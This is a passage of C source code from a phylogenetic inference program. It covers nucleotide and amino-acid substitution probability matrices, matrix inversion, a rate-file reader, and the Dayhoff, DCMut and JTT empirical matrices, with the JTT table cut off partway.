(*d2Pij)[0][1] = -fC*dd_e3;                      /* A->C */
(*d2Pij)[0][2] = pyr*fG/pur*dd_e3-fG/pur*dd_e1;  /* A->G */
(*d2Pij)[0][3] = -fT*dd_e3;                      /* A->T */
(*d2Pij)[1][0] = -fA*dd_e3;                      /* C->A */
(*d2Pij)[1][1] = pur*fC/pyr*dd_e3+fT/pyr*dd_e2;  /* C->C */
(*d2Pij)[1][2] = -fG*dd_e3;                      /* C->G */
(*d2Pij)[1][3] = pur*fT/pyr*dd_e3-fT/pyr*dd_e2;  /* C->T */
(*d2Pij)[2][0] = pyr*fA/pur*dd_e3-fA/pur*dd_e1;  /* G->A */
(*d2Pij)[2][1] = -fC*dd_e3;                      /* G->C */
(*d2Pij)[2][2] = pyr*fG/pur*dd_e3+fA/pur*dd_e1;  /* G->G */
(*d2Pij)[2][3] = -fT*dd_e3;                      /* G->T */
(*d2Pij)[3][0] = -fA*dd_e3;                      /* T->A */
(*d2Pij)[3][1] = pur*fC/pyr*dd_e3-fC/pyr*dd_e2;  /* T->C */
(*d2Pij)[3][2] = -fG*dd_e3;                      /* T->G */
(*d2Pij)[3][3] = pur*fT/pyr*dd_e3+fC/pyr*dd_e2;  /* T->T */
}
/*********************************************************/
int Matinv (double *x, int n, int m, double *space)
{
/* In-place Gauss-Jordan matrix inversion with partial pivoting.
 * x is an n-row matrix stored row-major in a buffer with row stride m
 * (m >= n). Returns 0 on success, -1 when a pivot is numerically zero
 * (matrix singular to working precision).
 * NOTE(review): 'space' is not used by this implementation — presumably
 * kept for interface compatibility with callers; confirm before removing.
 */
int i,j,k;
int *irow;           /* pivot row chosen at each elimination step */
double ee, t,t1,xmax;
double det;
ee = 1.0E-20;        /* threshold below which a pivot counts as zero */
det = 1.0;
irow = (int *)mCalloc(n,sizeof(int));
For (i,n)
{
/* find the largest pivot in column i, rows i..n-1 */
xmax = 0.;
for (j=i; j<n; j++)
if (xmax < fabs(x[j*m+i]))
{
xmax = fabs(x[j*m+i]);
irow[i]=j;
}
det *= xmax;
if (xmax < ee)
{
printf("\nDet becomes zero at %3d!\t\n", i+1);
free(irow); /* fix: irow was leaked on this early-return path */
return(-1);
}
/* swap the pivot row into place */
if (irow[i] != i)
{
For (j,m)
{
t = x[i*m+j];
x[i*m+j] = x[irow[i]*m+j];
x[irow[i]*m+j] = t;
}
}
/* eliminate column i from every other row */
t = 1./x[i*m+i];
For (j,n)
{
if (j == i) continue;
t1 = t*x[j*m+i];
For(k,m) x[j*m+k] -= t1*x[i*m+k];
x[j*m+i] = -t1;
}
For(j,m) x[i*m+j] *= t;
x[i*m+i] = t;
} /* i */
/* undo the row swaps (column swaps on the inverse) in reverse order */
for (i=n-1; i>=0; i--)
{
if (irow[i] == i) continue;
For(j,n)
{
t = x[j*m+i];
x[j*m+i] = x[j*m + irow[i]];
x[j*m + irow[i]] = t;
}
}
free(irow);
return (0);
}
/********************************************************************/
/* void PMat_Empirical(double l, model *mod, double ***Pij) */
/* */
/* Computes the substitution probability matrix */
/* from the initial substitution rate matrix and frequency vector */
/* and one specific branch length */
/* */
/* input : l , branch length */
/* input : mod , chosen model parameters, mat_Q and pi */
/* output : Pij , substitution probability matrix */
/* */
/* matrix P(l) is computed as follows : */
/* P(l) = exp(Q*t) , where : */
/* */
/* Q = substitution rate matrix = Vr*D*inverse(Vr) , where : */
/* */
/* Vr = right eigenvector matrix for Q */
/* D = diagonal matrix of eigenvalues for Q */
/* */
/* t = time interval = l / mr , where : */
/* */
/* mr = mean rate = branch length/time interval */
/* = sum(i)(pi[i]*p(i->j)) , where : */
/* */
/* pi = state frequency vector */
/* p(i->j) = subst. probability from i to a different state */
/* = -Q[ii] , as sum(j)(Q[ij]) +Q[ii] =0 */
/* */
/* the Taylor development of exp(Q*t) gives : */
/* P(l) = Vr*exp(D*t) *inverse(Vr) */
/* = Vr*pow(exp(D/mr),l)*inverse(Vr) */
/* */
/* for performance we compute only once the following matrices : */
/* Vr, inverse(Vr), exp(D/mr) */
/* thus each time we compute P(l) we only have to : */
/* make 20 times the operation pow() */
/* make 2 20x20 matrix multiplications , that is : */
/* 16000 = 2x20x20x20 times the operation * */
/* 16000 = 2x20x20x20 times the operation + */
/* which can be reduced to (the central matrix being diagonal) : */
/* 8400 = 20x20 + 20x20x20 times the operation * */
/* 8000 = 20x20x20 times the operation + */
/********************************************************************/
void PMat_Empirical(double l, model *mod, double ***Pij)
{
/* Compute P(l) = Vr * diag(eDmr^l) * Vi for an empirical rate matrix
 * whose eigen-decomposition was prepared beforehand (see the comment
 * block above this function). Results below MDBL_MIN are clamped.
 * NOTE(review): the two calloc results are not checked for NULL here,
 * matching the original behaviour — consider adding checks.
 */
int n = mod->ns;
int i, j, k;
double *right_ev,*left_ev,*eigen_exp;
double *diag_pow = (double*)calloc(n,sizeof(double));
double *scaled_ev = (double*)calloc(n*n,sizeof(double));

right_ev = mod->mat_Vr;   /* right eigenvectors of Q            */
left_ev  = mod->mat_Vi;   /* inverse (left) eigenvector matrix  */
eigen_exp = mod->vct_eDmr; /* exp(D/mr) diagonal, precomputed    */

/* start from a zero matrix */
for(i=0;i<n;i++)
for(k=0;k<n;k++)
(*Pij)[i][k] = .0;

/* raise the precomputed diagonal to the power l */
for(k=0;k<n;k++) diag_pow[k] = pow(eigen_exp[k], l);

/* scale the right eigenvectors by the diagonal ... */
for(i=0;i<n;i++)
for(k=0;k<n;k++)
scaled_ev[i*n+k] = right_ev[i*n+k] * diag_pow[k];

/* ... then multiply by the inverse eigenvector matrix */
for(i=0;i<n;i++)
{
for(j=0;j<n;j++)
{
for(k=0;k<n;k++)
(*Pij)[i][j] += scaled_ev[i*n+k] * left_ev[k*n+j];
if((*Pij)[i][j] < MDBL_MIN)
(*Pij)[i][j] = MDBL_MIN;
}
}

free(diag_pow);
free(scaled_ev);
}
/*********************************************************/
void PMat(double l, model *mod, double ***Pij)
{
/* Dispatch to the substitution-probability-matrix routine matching the
 * configured model. mod->datatype == 0 presumably means nucleotide data
 * (amino-acid data always uses the empirical path) — confirm elsewhere.
 * NOTE(review): the whichmodel thresholds (<3 K80-style, <7 TN93 family)
 * mirror the dPMat/d2PMat dispatchers below.
 */
if(mod->datatype != 0)
{
PMat_Empirical(l,mod,Pij);
return;
}
if(mod->whichmodel < 3)
PMat_K80(l,mod->kappa,Pij);
else if(mod->whichmodel < 7)
PMat_TN93(l,mod,Pij);
else
PMat_Empirical(l,mod,Pij);
}
/*********************************************************/
void dPMat(double l, double rr, model *mod, double ***dPij)
{
/* Dispatch the first-derivative computation: K80-style models
 * (whichmodel < 3) or the TN93 family for everything else. */
if(mod->whichmodel >= 3)
dPMat_TN93(l,dPij,mod,rr);
else
dPMat_K80(l,dPij,rr,mod->kappa);
}
/*********************************************************/
void d2PMat(double l, double rr, model *mod, double ***d2Pij)
{
/* Dispatch the second-derivative computation: K80-style models
 * (whichmodel < 3) or the TN93 family for everything else. */
if(mod->whichmodel >= 3)
d2PMat_TN93(l,d2Pij,mod,rr);
else
d2PMat_K80(l,d2Pij,rr,mod->kappa);
}
/*********************************************************/
int GetDaa (double *daa, double *pi, char *file_name)
{
/* Read a user-supplied 20x20 amino-acid distance (or substitution rate)
 * matrix plus 20 equilibrium frequencies from file_name.
 * The file holds the strict lower triangle row by row, followed by the
 * 20 frequencies; the matrix is mirrored to be symmetric.
 * Returns 0 on success; exits the program on a malformed file or when
 * the frequencies do not sum to 1 (within 1e-4).
 */
FILE * fdaa;
int i,j, naa;
double dmax,dmin;
double sum;
naa = 20;
dmax = .0;
dmin = 1.E+40;
fdaa = (FILE *)Openfile(file_name,0);
for (i=0; i<naa; i++) for (j=0; j<i; j++) {
/* fix: this fscanf was previously unchecked, unlike the pi loop below */
if(fscanf(fdaa, "%lf", &daa[i*naa+j])!=1) Exit("err aaRatefile");
daa[j*naa+i]=daa[i*naa+j];
if (dmax<daa[i*naa+j]) dmax=daa[i*naa+j];
if (dmin>daa[i*naa+j]) dmin=daa[i*naa+j];
}
For(i,naa) {
if(fscanf(fdaa,"%lf",&pi[i])!=1) Exit("err aaRatefile");
}
/* sanity check: frequencies must (approximately) sum to one */
sum = 0.0;
For(i, naa) sum += pi[i];
if (fabs(1-sum)>1e-4) {
printf("\nSum of freq. = %.6f != 1 in aaRateFile\n",sum);
exit(-1);
}
fclose (fdaa);
return (0);
}
/*********************************************************/
int Init_Qmat_Dayhoff(double *daa, double *pi)
{
/* Fill 'daa' (20x20, row-major) with the Dayhoff empirical amino-acid
 * exchangeability matrix: the lower triangle is written literally below
 * and then mirrored to the upper triangle. 'pi' receives the 20
 * equilibrium amino-acid frequencies. Always returns 1.
 * NOTE(review): the amino-acid index order is not visible in this file;
 * presumably the usual PAML ordering (A,R,N,D,C,Q,E,G,H,I,L,K,M,F,P,S,
 * T,W,Y,V) — confirm against the rest of the code base.
 */
/* Dayhoff's model data
 * Dayhoff, M.O., Schwartz, R.M., Orcutt, B.C. (1978)
 * "A model of evolutionary change in proteins."
 * Dayhoff, M.O.(ed.) Atlas of Protein Sequence Structur., Vol5, Suppl3.
 * National Biomedical Research Foundation, Washington DC, pp.345-352.
 */
int i,j,naa;
naa = 20;
/* lower triangle of the symmetric exchangeability matrix */
daa[ 1*20+ 0] = 27.00; daa[ 2*20+ 0] = 98.00; daa[ 2*20+ 1] = 32.00; daa[ 3*20+ 0] = 120.00;
daa[ 3*20+ 1] = 0.00; daa[ 3*20+ 2] = 905.00; daa[ 4*20+ 0] = 36.00; daa[ 4*20+ 1] = 23.00;
daa[ 4*20+ 2] = 0.00; daa[ 4*20+ 3] = 0.00; daa[ 5*20+ 0] = 89.00; daa[ 5*20+ 1] = 246.00;
daa[ 5*20+ 2] = 103.00; daa[ 5*20+ 3] = 134.00; daa[ 5*20+ 4] = 0.00; daa[ 6*20+ 0] = 198.00;
daa[ 6*20+ 1] = 1.00; daa[ 6*20+ 2] = 148.00; daa[ 6*20+ 3] = 1153.00; daa[ 6*20+ 4] = 0.00;
daa[ 6*20+ 5] = 716.00; daa[ 7*20+ 0] = 240.00; daa[ 7*20+ 1] = 9.00; daa[ 7*20+ 2] = 139.00;
daa[ 7*20+ 3] = 125.00; daa[ 7*20+ 4] = 11.00; daa[ 7*20+ 5] = 28.00; daa[ 7*20+ 6] = 81.00;
daa[ 8*20+ 0] = 23.00; daa[ 8*20+ 1] = 240.00; daa[ 8*20+ 2] = 535.00; daa[ 8*20+ 3] = 86.00;
daa[ 8*20+ 4] = 28.00; daa[ 8*20+ 5] = 606.00; daa[ 8*20+ 6] = 43.00; daa[ 8*20+ 7] = 10.00;
daa[ 9*20+ 0] = 65.00; daa[ 9*20+ 1] = 64.00; daa[ 9*20+ 2] = 77.00; daa[ 9*20+ 3] = 24.00;
daa[ 9*20+ 4] = 44.00; daa[ 9*20+ 5] = 18.00; daa[ 9*20+ 6] = 61.00; daa[ 9*20+ 7] = 0.00;
daa[ 9*20+ 8] = 7.00; daa[10*20+ 0] = 41.00; daa[10*20+ 1] = 15.00; daa[10*20+ 2] = 34.00;
daa[10*20+ 3] = 0.00; daa[10*20+ 4] = 0.00; daa[10*20+ 5] = 73.00; daa[10*20+ 6] = 11.00;
daa[10*20+ 7] = 7.00; daa[10*20+ 8] = 44.00; daa[10*20+ 9] = 257.00; daa[11*20+ 0] = 26.00;
daa[11*20+ 1] = 464.00; daa[11*20+ 2] = 318.00; daa[11*20+ 3] = 71.00; daa[11*20+ 4] = 0.00;
daa[11*20+ 5] = 153.00; daa[11*20+ 6] = 83.00; daa[11*20+ 7] = 27.00; daa[11*20+ 8] = 26.00;
daa[11*20+ 9] = 46.00; daa[11*20+10] = 18.00; daa[12*20+ 0] = 72.00; daa[12*20+ 1] = 90.00;
daa[12*20+ 2] = 1.00; daa[12*20+ 3] = 0.00; daa[12*20+ 4] = 0.00; daa[12*20+ 5] = 114.00;
daa[12*20+ 6] = 30.00; daa[12*20+ 7] = 17.00; daa[12*20+ 8] = 0.00; daa[12*20+ 9] = 336.00;
daa[12*20+10] = 527.00; daa[12*20+11] = 243.00; daa[13*20+ 0] = 18.00; daa[13*20+ 1] = 14.00;
daa[13*20+ 2] = 14.00; daa[13*20+ 3] = 0.00; daa[13*20+ 4] = 0.00; daa[13*20+ 5] = 0.00;
daa[13*20+ 6] = 0.00; daa[13*20+ 7] = 15.00; daa[13*20+ 8] = 48.00; daa[13*20+ 9] = 196.00;
daa[13*20+10] = 157.00; daa[13*20+11] = 0.00; daa[13*20+12] = 92.00; daa[14*20+ 0] = 250.00;
daa[14*20+ 1] = 103.00; daa[14*20+ 2] = 42.00; daa[14*20+ 3] = 13.00; daa[14*20+ 4] = 19.00;
daa[14*20+ 5] = 153.00; daa[14*20+ 6] = 51.00; daa[14*20+ 7] = 34.00; daa[14*20+ 8] = 94.00;
daa[14*20+ 9] = 12.00; daa[14*20+10] = 32.00; daa[14*20+11] = 33.00; daa[14*20+12] = 17.00;
daa[14*20+13] = 11.00; daa[15*20+ 0] = 409.00; daa[15*20+ 1] = 154.00; daa[15*20+ 2] = 495.00;
daa[15*20+ 3] = 95.00; daa[15*20+ 4] = 161.00; daa[15*20+ 5] = 56.00; daa[15*20+ 6] = 79.00;
daa[15*20+ 7] = 234.00; daa[15*20+ 8] = 35.00; daa[15*20+ 9] = 24.00; daa[15*20+10] = 17.00;
daa[15*20+11] = 96.00; daa[15*20+12] = 62.00; daa[15*20+13] = 46.00; daa[15*20+14] = 245.00;
daa[16*20+ 0] = 371.00; daa[16*20+ 1] = 26.00; daa[16*20+ 2] = 229.00; daa[16*20+ 3] = 66.00;
daa[16*20+ 4] = 16.00; daa[16*20+ 5] = 53.00; daa[16*20+ 6] = 34.00; daa[16*20+ 7] = 30.00;
daa[16*20+ 8] = 22.00; daa[16*20+ 9] = 192.00; daa[16*20+10] = 33.00; daa[16*20+11] = 136.00;
daa[16*20+12] = 104.00; daa[16*20+13] = 13.00; daa[16*20+14] = 78.00; daa[16*20+15] = 550.00;
daa[17*20+ 0] = 0.00; daa[17*20+ 1] = 201.00; daa[17*20+ 2] = 23.00; daa[17*20+ 3] = 0.00;
daa[17*20+ 4] = 0.00; daa[17*20+ 5] = 0.00; daa[17*20+ 6] = 0.00; daa[17*20+ 7] = 0.00;
daa[17*20+ 8] = 27.00; daa[17*20+ 9] = 0.00; daa[17*20+10] = 46.00; daa[17*20+11] = 0.00;
daa[17*20+12] = 0.00; daa[17*20+13] = 76.00; daa[17*20+14] = 0.00; daa[17*20+15] = 75.00;
daa[17*20+16] = 0.00; daa[18*20+ 0] = 24.00; daa[18*20+ 1] = 8.00; daa[18*20+ 2] = 95.00;
daa[18*20+ 3] = 0.00; daa[18*20+ 4] = 96.00; daa[18*20+ 5] = 0.00; daa[18*20+ 6] = 22.00;
daa[18*20+ 7] = 0.00; daa[18*20+ 8] = 127.00; daa[18*20+ 9] = 37.00; daa[18*20+10] = 28.00;
daa[18*20+11] = 13.00; daa[18*20+12] = 0.00; daa[18*20+13] = 698.00; daa[18*20+14] = 0.00;
daa[18*20+15] = 34.00; daa[18*20+16] = 42.00; daa[18*20+17] = 61.00; daa[19*20+ 0] = 208.00;
daa[19*20+ 1] = 24.00; daa[19*20+ 2] = 15.00; daa[19*20+ 3] = 18.00; daa[19*20+ 4] = 49.00;
daa[19*20+ 5] = 35.00; daa[19*20+ 6] = 37.00; daa[19*20+ 7] = 54.00; daa[19*20+ 8] = 44.00;
daa[19*20+ 9] = 889.00; daa[19*20+10] = 175.00; daa[19*20+11] = 10.00; daa[19*20+12] = 258.00;
daa[19*20+13] = 12.00; daa[19*20+14] = 48.00; daa[19*20+15] = 30.00; daa[19*20+16] = 157.00;
daa[19*20+17] = 0.00; daa[19*20+18] = 28.00;
/* mirror the lower triangle to make the matrix symmetric */
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
/* equilibrium amino-acid frequencies */
pi[ 0] = 0.087127; pi[ 1] = 0.040904; pi[ 2] = 0.040432; pi[ 3] = 0.046872;
pi[ 4] = 0.033474; pi[ 5] = 0.038255; pi[ 6] = 0.049530; pi[ 7] = 0.088612;
pi[ 8] = 0.033618; pi[ 9] = 0.036886; pi[10] = 0.085357; pi[11] = 0.080482;
pi[12] = 0.014753; pi[13] = 0.039772; pi[14] = 0.050680; pi[15] = 0.069577;
pi[16] = 0.058542; pi[17] = 0.010494; pi[18] = 0.029916; pi[19] = 0.064718;
return 1;
}
/*********************************************************/
int Init_Qmat_DCMut(double *daa, double *pi)
{
/* Fill 'daa' (20x20, row-major) with the DCMut empirical amino-acid
 * exchangeability matrix: the lower triangle is written literally below
 * and then mirrored to the upper triangle. 'pi' receives the 20
 * equilibrium amino-acid frequencies. Always returns 1.
 * NOTE(review): amino-acid index order is assumed to match the other
 * Init_Qmat_* tables in this file — confirm against the caller.
 */
/*
DCMut : new implementation based on Dayhoff et al.'s raw data and amino acid mutabilities
C. Kosiol and N. Goldman
http://www.ebi.ac.uk/goldman-srv/dayhoff/
*/
int i,j,naa;
naa = 20;
/* lower triangle of the symmetric exchangeability matrix */
daa[ 1*20+ 0] = 26.78280; daa[ 2*20+ 0] = 98.44740; daa[ 2*20+ 1] = 32.70590; daa[ 3*20+ 0] = 119.98050;
daa[ 3*20+ 1] = 0.00000; daa[ 3*20+ 2] = 893.15150; daa[ 4*20+ 0] = 36.00160; daa[ 4*20+ 1] = 23.23740;
daa[ 4*20+ 2] = 0.00000; daa[ 4*20+ 3] = 0.00000; daa[ 5*20+ 0] = 88.77530; daa[ 5*20+ 1] = 243.99390;
daa[ 5*20+ 2] = 102.85090; daa[ 5*20+ 3] = 134.85510; daa[ 5*20+ 4] = 0.00000; daa[ 6*20+ 0] = 196.11670;
daa[ 6*20+ 1] = 0.00000; daa[ 6*20+ 2] = 149.34090; daa[ 6*20+ 3] = 1138.86590; daa[ 6*20+ 4] = 0.00000;
daa[ 6*20+ 5] = 708.60220; daa[ 7*20+ 0] = 238.61110; daa[ 7*20+ 1] = 8.77910; daa[ 7*20+ 2] = 138.53520;
daa[ 7*20+ 3] = 124.09810; daa[ 7*20+ 4] = 10.72780; daa[ 7*20+ 5] = 28.15810; daa[ 7*20+ 6] = 81.19070;
daa[ 8*20+ 0] = 22.81160; daa[ 8*20+ 1] = 238.31480; daa[ 8*20+ 2] = 529.00240; daa[ 8*20+ 3] = 86.82410;
daa[ 8*20+ 4] = 28.27290; daa[ 8*20+ 5] = 601.16130; daa[ 8*20+ 6] = 43.94690; daa[ 8*20+ 7] = 10.68020;
daa[ 9*20+ 0] = 65.34160; daa[ 9*20+ 1] = 63.26290; daa[ 9*20+ 2] = 76.80240; daa[ 9*20+ 3] = 23.92480;
daa[ 9*20+ 4] = 43.80740; daa[ 9*20+ 5] = 18.03930; daa[ 9*20+ 6] = 60.95260; daa[ 9*20+ 7] = 0.00000;
daa[ 9*20+ 8] = 7.69810; daa[10*20+ 0] = 40.64310; daa[10*20+ 1] = 15.49240; daa[10*20+ 2] = 34.11130;
daa[10*20+ 3] = 0.00000; daa[10*20+ 4] = 0.00000; daa[10*20+ 5] = 73.07720; daa[10*20+ 6] = 11.28800;
daa[10*20+ 7] = 7.15140; daa[10*20+ 8] = 44.35040; daa[10*20+ 9] = 255.66850; daa[11*20+ 0] = 25.86350;
daa[11*20+ 1] = 461.01240; daa[11*20+ 2] = 314.83710; daa[11*20+ 3] = 71.69130; daa[11*20+ 4] = 0.00000;
daa[11*20+ 5] = 151.90780; daa[11*20+ 6] = 83.00780; daa[11*20+ 7] = 26.76830; daa[11*20+ 8] = 27.04750;
daa[11*20+ 9] = 46.08570; daa[11*20+10] = 18.06290; daa[12*20+ 0] = 71.78400; daa[12*20+ 1] = 89.63210;
daa[12*20+ 2] = 0.00000; daa[12*20+ 3] = 0.00000; daa[12*20+ 4] = 0.00000; daa[12*20+ 5] = 112.74990;
daa[12*20+ 6] = 30.48030; daa[12*20+ 7] = 17.03720; daa[12*20+ 8] = 0.00000; daa[12*20+ 9] = 333.27320;
daa[12*20+10] = 523.01150; daa[12*20+11] = 241.17390; daa[13*20+ 0] = 18.36410; daa[13*20+ 1] = 13.69060;
daa[13*20+ 2] = 13.85030; daa[13*20+ 3] = 0.00000; daa[13*20+ 4] = 0.00000; daa[13*20+ 5] = 0.00000;
daa[13*20+ 6] = 0.00000; daa[13*20+ 7] = 15.34780; daa[13*20+ 8] = 47.59270; daa[13*20+ 9] = 195.19510;
daa[13*20+10] = 156.51600; daa[13*20+11] = 0.00000; daa[13*20+12] = 92.18600; daa[14*20+ 0] = 248.59200;
daa[14*20+ 1] = 102.83130; daa[14*20+ 2] = 41.92440; daa[14*20+ 3] = 13.39400; daa[14*20+ 4] = 18.75500;
daa[14*20+ 5] = 152.61880; daa[14*20+ 6] = 50.70030; daa[14*20+ 7] = 34.71530; daa[14*20+ 8] = 93.37090;
daa[14*20+ 9] = 11.91520; daa[14*20+10] = 31.62580; daa[14*20+11] = 33.54190; daa[14*20+12] = 17.02050;
daa[14*20+13] = 11.05060; daa[15*20+ 0] = 405.18700; daa[15*20+ 1] = 153.15900; daa[15*20+ 2] = 488.58920;
daa[15*20+ 3] = 95.60970; daa[15*20+ 4] = 159.83560; daa[15*20+ 5] = 56.18280; daa[15*20+ 6] = 79.39990;
daa[15*20+ 7] = 232.22430; daa[15*20+ 8] = 35.36430; daa[15*20+ 9] = 24.79550; daa[15*20+10] = 17.14320;
daa[15*20+11] = 95.45570; daa[15*20+12] = 61.99510; daa[15*20+13] = 45.99010; daa[15*20+14] = 242.72020;
daa[16*20+ 0] = 368.03650; daa[16*20+ 1] = 26.57450; daa[16*20+ 2] = 227.16970; daa[16*20+ 3] = 66.09300;
daa[16*20+ 4] = 16.23660; daa[16*20+ 5] = 52.56510; daa[16*20+ 6] = 34.01560; daa[16*20+ 7] = 30.66620;
daa[16*20+ 8] = 22.63330; daa[16*20+ 9] = 190.07390; daa[16*20+10] = 33.10900; daa[16*20+11] = 135.05990;
daa[16*20+12] = 103.15340; daa[16*20+13] = 13.66550; daa[16*20+14] = 78.28570; daa[16*20+15] = 543.66740;
daa[17*20+ 0] = 0.00000; daa[17*20+ 1] = 200.13750; daa[17*20+ 2] = 22.49680; daa[17*20+ 3] = 0.00000;
daa[17*20+ 4] = 0.00000; daa[17*20+ 5] = 0.00000; daa[17*20+ 6] = 0.00000; daa[17*20+ 7] = 0.00000;
daa[17*20+ 8] = 27.05640; daa[17*20+ 9] = 0.00000; daa[17*20+10] = 46.17760; daa[17*20+11] = 0.00000;
daa[17*20+12] = 0.00000; daa[17*20+13] = 76.23540; daa[17*20+14] = 0.00000; daa[17*20+15] = 74.08190;
daa[17*20+16] = 0.00000; daa[18*20+ 0] = 24.41390; daa[18*20+ 1] = 7.80120; daa[18*20+ 2] = 94.69400;
daa[18*20+ 3] = 0.00000; daa[18*20+ 4] = 95.31640; daa[18*20+ 5] = 0.00000; daa[18*20+ 6] = 21.47170;
daa[18*20+ 7] = 0.00000; daa[18*20+ 8] = 126.54000; daa[18*20+ 9] = 37.48340; daa[18*20+10] = 28.65720;
daa[18*20+11] = 13.21420; daa[18*20+12] = 0.00000; daa[18*20+13] = 695.26290; daa[18*20+14] = 0.00000;
daa[18*20+15] = 33.62890; daa[18*20+16] = 41.78390; daa[18*20+17] = 60.80700; daa[19*20+ 0] = 205.95640;
daa[19*20+ 1] = 24.03680; daa[19*20+ 2] = 15.80670; daa[19*20+ 3] = 17.83160; daa[19*20+ 4] = 48.46780;
daa[19*20+ 5] = 34.69830; daa[19*20+ 6] = 36.72500; daa[19*20+ 7] = 53.81650; daa[19*20+ 8] = 43.87150;
daa[19*20+ 9] = 881.00380; daa[19*20+10] = 174.51560; daa[19*20+11] = 10.38500; daa[19*20+12] = 256.59550;
daa[19*20+13] = 12.36060; daa[19*20+14] = 48.50260; daa[19*20+15] = 30.38360; daa[19*20+16] = 156.19970;
daa[19*20+17] = 0.00000; daa[19*20+18] = 27.93790;
/* mirror the lower triangle to make the matrix symmetric */
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
/* equilibrium amino-acid frequencies */
pi[ 0] = 0.087127; pi[ 1] = 0.040904; pi[ 2] = 0.040432; pi[ 3] = 0.046872;
pi[ 4] = 0.033474; pi[ 5] = 0.038255; pi[ 6] = 0.049530; pi[ 7] = 0.088612;
pi[ 8] = 0.033619; pi[ 9] = 0.036886; pi[10] = 0.085357; pi[11] = 0.080481;
pi[12] = 0.014753; pi[13] = 0.039772; pi[14] = 0.050680; pi[15] = 0.069577;
pi[16] = 0.058542; pi[17] = 0.010494; pi[18] = 0.029916; pi[19] = 0.064718;
return 1;
}
/*********************************************************/
int Init_Qmat_JTT(double *daa, double *pi)
{
/* Fill 'daa' (20x20, row-major) with the JTT empirical amino-acid
 * exchangeability matrix: the lower triangle is written literally below
 * and then mirrored to the upper triangle. 'pi' receives the 20
 * equilibrium amino-acid frequencies. Always returns 1.
 * NOTE(review): amino-acid index order is assumed to match the other
 * Init_Qmat_* tables in this file — confirm against the caller.
 */
int i,j,naa;
/* JTT's model data
 * D.T.Jones, W.R.Taylor and J.M.Thornton
 * "The rapid generation of mutation data matrices from protein sequences"
 * CABIOS vol.8 no.3 1992 pp275-282
 */
naa = 20;
/* lower triangle of the symmetric exchangeability matrix */
daa[ 1*20+ 0] = 58.00; daa[ 2*20+ 0] = 54.00; daa[ 2*20+ 1] = 45.00; daa[ 3*20+ 0] = 81.00;
daa[ 3*20+ 1] = 16.00; daa[ 3*20+ 2] = 528.00; daa[ 4*20+ 0] = 56.00; daa[ 4*20+ 1] = 113.00;
daa[ 4*20+ 2] = 34.00; daa[ 4*20+ 3] = 10.00; daa[ 5*20+ 0] = 57.00; daa[ 5*20+ 1] = 310.00;
daa[ 5*20+ 2] = 86.00; daa[ 5*20+ 3] = 49.00; daa[ 5*20+ 4] = 9.00; daa[ 6*20+ 0] = 105.00;
daa[ 6*20+ 1] = 29.00; daa[ 6*20+ 2] = 58.00; daa[ 6*20+ 3] = 767.00; daa[ 6*20+ 4] = 5.00;
daa[ 6*20+ 5] = 323.00; daa[ 7*20+ 0] = 179.00; daa[ 7*20+ 1] = 137.00; daa[ 7*20+ 2] = 81.00;
daa[ 7*20+ 3] = 130.00; daa[ 7*20+ 4] = 59.00; daa[ 7*20+ 5] = 26.00; daa[ 7*20+ 6] = 119.00;
daa[ 8*20+ 0] = 27.00; daa[ 8*20+ 1] = 328.00; daa[ 8*20+ 2] = 391.00; daa[ 8*20+ 3] = 112.00;
daa[ 8*20+ 4] = 69.00; daa[ 8*20+ 5] = 597.00; daa[ 8*20+ 6] = 26.00; daa[ 8*20+ 7] = 23.00;
daa[ 9*20+ 0] = 36.00; daa[ 9*20+ 1] = 22.00; daa[ 9*20+ 2] = 47.00; daa[ 9*20+ 3] = 11.00;
daa[ 9*20+ 4] = 17.00; daa[ 9*20+ 5] = 9.00; daa[ 9*20+ 6] = 12.00; daa[ 9*20+ 7] = 6.00;
daa[ 9*20+ 8] = 16.00; daa[10*20+ 0] = 30.00; daa[10*20+ 1] = 38.00; daa[10*20+ 2] = 12.00;
daa[10*20+ 3] = 7.00; daa[10*20+ 4] = 23.00; daa[10*20+ 5] = 72.00; daa[10*20+ 6] = 9.00;
daa[10*20+ 7] = 6.00; daa[10*20+ 8] = 56.00; daa[10*20+ 9] = 229.00; daa[11*20+ 0] = 35.00;
daa[11*20+ 1] = 646.00; daa[11*20+ 2] = 263.00; daa[11*20+ 3] = 26.00; daa[11*20+ 4] = 7.00;
daa[11*20+ 5] = 292.00; daa[11*20+ 6] = 181.00; daa[11*20+ 7] = 27.00; daa[11*20+ 8] = 45.00;
daa[11*20+ 9] = 21.00; daa[11*20+10] = 14.00; daa[12*20+ 0] = 54.00; daa[12*20+ 1] = 44.00;
daa[12*20+ 2] = 30.00; daa[12*20+ 3] = 15.00; daa[12*20+ 4] = 31.00; daa[12*20+ 5] = 43.00;
daa[12*20+ 6] = 18.00; daa[12*20+ 7] = 14.00; daa[12*20+ 8] = 33.00; daa[12*20+ 9] = 479.00;
daa[12*20+10] = 388.00; daa[12*20+11] = 65.00; daa[13*20+ 0] = 15.00; daa[13*20+ 1] = 5.00;
daa[13*20+ 2] = 10.00; daa[13*20+ 3] = 4.00; daa[13*20+ 4] = 78.00; daa[13*20+ 5] = 4.00;
daa[13*20+ 6] = 5.00; daa[13*20+ 7] = 5.00; daa[13*20+ 8] = 40.00; daa[13*20+ 9] = 89.00;
daa[13*20+10] = 248.00; daa[13*20+11] = 4.00; daa[13*20+12] = 43.00; daa[14*20+ 0] = 194.00;
daa[14*20+ 1] = 74.00; daa[14*20+ 2] = 15.00; daa[14*20+ 3] = 15.00; daa[14*20+ 4] = 14.00;
daa[14*20+ 5] = 164.00; daa[14*20+ 6] = 18.00; daa[14*20+ 7] = 24.00; daa[14*20+ 8] = 115.00;
daa[14*20+ 9] = 10.00; daa[14*20+10] = 102.00; daa[14*20+11] = 21.00; daa[14*20+12] = 16.00;
daa[14*20+13] = 17.00; daa[15*20+ 0] = 378.00; daa[15*20+ 1] = 101.00; daa[15*20+ 2] = 503.00;
daa[15*20+ 3] = 59.00; daa[15*20+ 4] = 223.00; daa[15*20+ 5] = 53.00; daa[15*20+ 6] = 30.00;
daa[15*20+ 7] = 201.00; daa[15*20+ 8] = 73.00; daa[15*20+ 9] = 40.00; daa[15*20+10] = 59.00;
daa[15*20+11] = 47.00; daa[15*20+12] = 29.00; daa[15*20+13] = 92.00; daa[15*20+14] = 285.00;
daa[16*20+ 0] = 475.00; daa[16*20+ 1] = 64.00; daa[16*20+ 2] = 232.00; daa[16*20+ 3] = 38.00;
